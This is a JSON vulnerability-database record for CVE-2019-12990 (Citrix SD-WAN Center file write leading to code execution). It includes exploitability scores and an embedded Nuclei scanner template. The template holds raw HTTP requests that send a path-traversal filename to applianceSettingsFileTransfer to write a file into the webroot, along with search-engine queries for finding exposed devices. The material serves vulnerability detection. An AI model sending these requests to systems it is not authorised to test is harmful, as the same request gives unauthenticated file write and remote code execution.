{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2019-12990/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2019-12990/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2019-12990/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2019-12990/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2019-12990/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2019-12990"},"sightings":{"href":"/api/v1/sightings/cve-2019-12990"}},"enrichments":{"cisa-kev":{"kev":false},"epss":{"epss":0.39335,"kev":false,"percentile":0.98541},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2019/CVE-2019-12990.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2019-12990\n\ninfo:\n  name: Citrix SD-WAN Center - Local File Inclusion\n  author: gy741\n  severity: critical\n  description: |\n    Citrix SD-WAN Center is susceptible to local file inclusion via the applianceSettingsFileTransfer function in ApplianceSettingsController. The function does not sufficiently validate or sanitize HTTP request parameter values used to construct a file system path. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for filename, filedata, and workspace_id, therefore being able to write files to locations writable by the www-data user and/or to write a crafted PHP file to /home/talariuser/www/app/webroot/files/ to execute arbitrary PHP code.\n  impact: |\n    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, remote code execution, or denial of service.\n  remediation: |\n    Apply the latest security patches or updates provided by Citrix to mitigate the vulnerability.\n  reference:\n    - https://www.tenable.com/security/research/tra-2019-31\n    - https://support.citrix.com/search?searchQuery=*&lang=en&sort=relevance&prod=&pver=&ct=Security+Bulletin\n    - https://nvd.nist.gov/vuln/detail/CVE-2019-12990\n    - https://support.citrix.com/search?searchQuery=%2A&lang=en&sort=relevance&prod=&pver=&ct=Security+Bulletin\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2019-12990\n    cwe-id: CWE-22\n    epss-score: 0.39335\n    epss-percentile: 0.98541\n    cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 3\n    vendor: citrix\n    product: netscaler_sd-wan\n    shodan-query:\n      - http.title:\"Citrix SD-WAN\"\n      - http.title:\"citrix sd-wan\"\n    fofa-query: title=\"citrix sd-wan\"\n    google-query: intitle:\"citrix sd-wan\"\n  tags: cve,cve2019,citrix,rce,unauth,tenable,intrusive,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        GET /login HTTP/1.1\n        Host: {{Hostname}}\n      - |\n        POST /Collector/appliancesettings/applianceSettingsFileTransfer HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        filename=../../../../../../home/talariuser/www/app/webroot/files/{{randstr}}&filedata=\n      - |\n        GET /talari/app/files/{{randstr}} HTTP/1.1\n        Host: {{Hostname}}\n        Accept: */*\n\n    matchers:\n      - type: dsl\n        dsl:\n          - contains(header, \"text/html\")\n          - status_code_3 == 200\n          - contains(body_1, \"<title>Citrix SD-WAN</title>\")\n        condition: and\n# digest: 4a0a00473045022100812c574e28e79f3a237ca1b617b22ad528036b1d27e310932b5462aa3d618d3d02207a56d9fff0abe3f5fa50e7f15755f1c168608bbaa5a7f88f621c0ba1cee2dd3e:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2019-12990"}